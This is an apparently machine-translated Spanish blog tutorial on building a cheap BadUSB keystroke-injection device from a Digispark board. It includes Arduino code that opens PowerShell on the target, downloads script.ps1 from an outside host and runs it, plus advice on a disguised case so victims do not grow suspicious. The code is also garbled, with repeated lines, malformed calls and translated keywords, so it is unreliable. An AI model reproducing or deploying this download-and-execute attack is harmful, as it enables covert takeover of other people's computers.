"unidad flash" programable o cómo hacerse cargo rápidamente de su computadora

Hoy en día, la entrada es una forma de tutorial sobre cómo crear su propia memoria USB programable a lo largo de las líneas de la cara y popular Rubber Ducky de Hak5. Se trabajará en el principio de un teclado – conectado a la computadora entra en una secuencia de teclas preprogramadas. El primer paso es comprar una placa Arduino en miniatura basada en el microcontrolador ATtiny85 – Digispark. El más barato se puede encontrar de nuestros amigos de China en uno de los sitios de subastas populares. Los precios comienzan allí desde tan solo $ 1 –Digispark Como a veces ATtiny85 - Digispark hay un problema con la detección de DigiSpark por parte de algunas computadoras (especialmente los puertos USB3), lo mejor es abastecerse inmediatamente de un adaptador, que resuelve este problema (cuesta aproximadamente 2 $) –Adaptador Cuando el equipo ordenado nos llega necesitamos programar adaptador USB su entorno, que será Adruino IDE –Arduino Tutorial que se conecta a él Digisparka que podemos encontrar aquí –Esquema Nuestro controlador tiene una cantidad limitada de memoria, por lo que la carga útil correcta puede no caber en él. Fui alrededor de este problema poniendo en él un código que descarga un script con carga útil utilizando un powershell, que a su vez se ejecutará más tarde en el ordenador de la víctima:

#include "DigiKeyboard.h" void setup() { }

void loop() { DigiKeyboard.sendKeyStroke(0); DigiKeyboard.delay(500); DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT); DigiKeyboard.delay(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.print("powershell"); DigiKeyboard.sendKeyStroke(500); DigiKeyboard.KEY_ENTER); DigiKeyboard.delay(1000); DigiKeyboard.print("$client = new-object System.Net.WebClient"); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(500); DigiKeyboard.print("$client. DownloadFile("https://my127001.pl/script.ps1" , "script.ps1")"); DigiKeyboard.sendKeyStroke(KEY_ENTER); DigiKeyboard.delay(2000); DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT | KEY_R); DigiKeyboard.delay(750); DigiKeyboard.print("powershell.exe -File script.ps1"); DigiKeyboard.sendKeyStroke(KEY_ENTER); para (;;) { /*vacío*/ }

}

Con el fin de hacer aún más la aparición de nuestra pendriva más autoritful, para que no despierta sospechas, vale la pena abastecerse de una carcasa impresa, por ejemplo, desde el diseño bajoel enlace – Vivienda Todo el asunto se ve así y puede tomar el control de la computadora de la víctima en segundos: "unidad flash" programable

Chcesz wiedzieć więcej?

Zapisz się i bądź informowany o nowych postach (zero spamu!).
Dodatkowo otrzymasz, moją prywatną listę 15 najbardziej przydatnych narzędzi (wraz z krótkim opisem), których używam przy testach penetracyjnych.

Nigdy nie podam, nie wymienię ani nie sprzedam Twojego adresu e-mail. W każdej chwili możesz zrezygnować z subskrypcji.

Marcar el Enlace permanente.

Podziel się swoją opinią na temat artykułu